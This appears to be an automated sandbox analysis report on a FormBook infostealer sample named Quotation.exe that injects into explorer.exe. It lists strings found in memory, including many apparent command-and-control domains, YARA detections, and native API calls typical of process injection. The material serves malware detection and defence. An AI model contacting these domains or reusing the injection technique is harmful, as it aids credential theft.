      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nline-advertising-18349.bondReferer:
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.owboyaero.net
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.owboyaero.net/hy29/
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.owboyaero.net/hy29/www.84jys301.top
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.owboyaero.netReferer:
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rbis.site
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rbis.site/hy29/
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rbis.site/hy29/www.alkak.cam
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rbis.siteReferer:
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ulbcenter.shop
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ulbcenter.shop/hy29/
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ulbcenter.shop/hy29/www.ulunguwethu.store
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ulbcenter.shopReferer:
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ulunguwethu.store
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ulunguwethu.store/hy29/
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ulunguwethu.store/hy29/www.n6n.xyz
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ulunguwethu.storeReferer:
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.unnify.net
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.unnify.net/hy29/
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.unnify.net/hy29/www.ylosnackpark.online
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.unnify.netReferer:
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ustdoit.store
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ustdoit.store/hy29/
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ustdoit.store/hy29/www.dfg3n489.cyou
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ustdoit.storeReferer:
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.veriox.xyz
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.veriox.xyz/hy29/
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.veriox.xyz/hy29/www.owboyaero.net
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.veriox.xyzReferer:
      Source: Quotation.exe, 00000003.00000001.2393775567.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: Quotation.exe, 00000003.00000001.2393775567.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yaanincma.store
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yaanincma.store/hy29/
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yaanincma.store/hy29/concg
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yaanincma.storeReferer:
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ylosnackpark.online
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ylosnackpark.online/hy29/
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ylosnackpark.online/hy29/www.eifeigou.top
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ylosnackpark.onlineReferer:
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zrk148.ink
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zrk148.ink/hy29/
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zrk148.ink/hy29/www.unnify.net
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zrk148.inkReferer:
      Source: explorer.exe, 00000005.00000000.2527576116.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3264925977.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
      Source: explorer.exe, 00000005.00000002.3259903697.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2521577979.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
      Source: explorer.exe, 00000005.00000002.3262290605.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2523519321.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
      Source: explorer.exe, 00000005.00000000.2521577979.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3259903697.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
      Source: explorer.exe, 00000005.00000000.2520656031.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3258695825.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
      Source: explorer.exe, 00000005.00000002.3262974306.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3094424197.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3094747500.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2523519321.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
      Source: Quotation.exe, 00000003.00000001.2393775567.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: explorer.exe, 00000005.00000003.3094424197.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3094747500.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3262974306.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2523519321.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
      Source: explorer.exe, 00000005.00000000.2527576116.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3264925977.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
      Source: explorer.exe, 00000005.00000000.2523519321.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3262290605.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
      Source: explorer.exe, 00000005.00000000.2523519321.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3262290605.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004056E5 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056E5

      E-Banking Fraud

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.3257861968.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.2567406164.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.3257499889.0000000000AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.2614406463.0000000033AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000006.00000002.3257861968.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000006.00000002.3257861968.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000002.3257861968.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000003.00000002.2567406164.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000003.00000002.2567406164.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000003.00000002.2567406164.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000006.00000002.3257499889.0000000000AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000006.00000002.3257499889.0000000000AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000002.3257499889.0000000000AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000003.00000002.2614406463.0000000033AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000003.00000002.2614406463.0000000033AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000003.00000002.2614406463.0000000033AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: Process Memory Space: Quotation.exe PID: 3288, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: Process Memory Space: colorcpl.exe PID: 2284, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Initial sample is a PE file and has a suspicious name
      Source: initial sampleStatic PE information: Filename: Quotation.exe
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_33E92BF0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92B60 NtClose,LdrInitializeThunk,3_2_33E92B60
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92AD0 NtReadFile,LdrInitializeThunk,3_2_33E92AD0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92FE0 NtCreateFile,LdrInitializeThunk,3_2_33E92FE0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92FB0 NtResumeThread,LdrInitializeThunk,3_2_33E92FB0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92F90 NtProtectVirtualMemory,LdrInitializeThunk,3_2_33E92F90
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92F30 NtCreateSection,LdrInitializeThunk,3_2_33E92F30
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_33E92EA0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_33E92E80
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_33E92DF0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92DD0 NtDelayExecution,LdrInitializeThunk,3_2_33E92DD0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_33E92D30
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92D10 NtMapViewOfSection,LdrInitializeThunk,3_2_33E92D10
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_33E92CA0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_33E92C70
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E94340 NtSetContextThread,3_2_33E94340
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E93090 NtSetValueKey,3_2_33E93090
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E93010 NtOpenDirectoryObject,3_2_33E93010
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E94650 NtSuspendThread,3_2_33E94650
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E935C0 NtCreateMutant,3_2_33E935C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92BE0 NtQueryValueKey,3_2_33E92BE0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92BA0 NtEnumerateValueKey,3_2_33E92BA0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92B80 NtQueryInformationFile,3_2_33E92B80
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92AF0 NtWriteFile,3_2_33E92AF0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92AB0 NtWaitForSingleObject,3_2_33E92AB0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E939B0 NtGetContextThread,3_2_33E939B0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92FA0 NtQuerySection,3_2_33E92FA0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92F60 NtCreateProcessEx,3_2_33E92F60
      Source: C:\Windows\explorer.exeCode function: 5_2_0B142E12 NtProtectVirtualMemory,5_2_0B142E12
      Source: C:\Windows\explorer.exeCode function: 5_2_0B141232 NtCreateFile,5_2_0B141232
      Source: C:\Windows\explorer.exeCode function: 5_2_0B142E0A NtProtectVirtualMemory,5_2_0B142E0A
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034FC
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00406C3F0_2_00406C3F
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_73421BFF0_2_73421BFF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F203E63_2_33F203E6
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E6E3F03_2_33E6E3F0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EA739A3_2_33EA739A
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F1A3523_2_33F1A352
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4D34C3_2_33E4D34C
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F1132D3_2_33F1132D
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F012ED3_2_33F012ED
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E7B2C03_2_33E7B2C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E652A03_2_33E652A0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F002743_2_33F00274
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F181CC3_2_33F181CC
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E6B1B03_2_33E6B1B0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F201AA3_2_33F201AA
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E9516C3_2_33E9516C
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F1723_2_33E4F172
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F2B16B3_2_33F2B16B
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EE81583_2_33EE8158
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E501003_2_33E50100
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EFA1183_2_33EFA118
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F1F0E03_2_33F1F0E0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F170E93_2_33F170E9
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E670C03_2_33E670C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F0F0CC3_2_33F0F0CC
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E5C7C03_2_33E5C7C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F1F7B03_2_33F1F7B0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E607703_2_33E60770
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E847503_2_33E84750
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E7C6E03_2_33E7C6E0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F116CC3_2_33F116CC
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EFD5B03_2_33EFD5B0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F205913_2_33F20591
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F175713_2_33F17571
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E605353_2_33E60535
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F0E4F63_2_33F0E4F6
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E514603_2_33E51460
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F124463_2_33F12446
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F1F43F3_2_33F1F43F
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E9DBF93_2_33E9DBF9
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED5BF03_2_33ED5BF0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F16BD73_2_33F16BD7
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E7FB803_2_33E7FB80
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F1FB763_2_33F1FB76
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F1AB403_2_33F1AB40
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F0DAC63_2_33F0DAC6
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EFDAAC3_2_33EFDAAC
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EA5AA03_2_33EA5AA0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E5EA803_2_33E5EA80
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED3A6C3_2_33ED3A6C
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F17A463_2_33F17A46
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F1FA493_2_33F1FA49
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E629A03_2_33E629A0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F2A9A63_2_33F2A9A6
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E769623_2_33E76962
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E699503_2_33E69950
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E7B9503_2_33E7B950
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E638E03_2_33E638E0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E8E8F03_2_33E8E8F0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E468B83_2_33E468B8
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E628403_2_33E62840
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E6A8403_2_33E6A840
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ECD8003_2_33ECD800
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E6CFE03_2_33E6CFE0
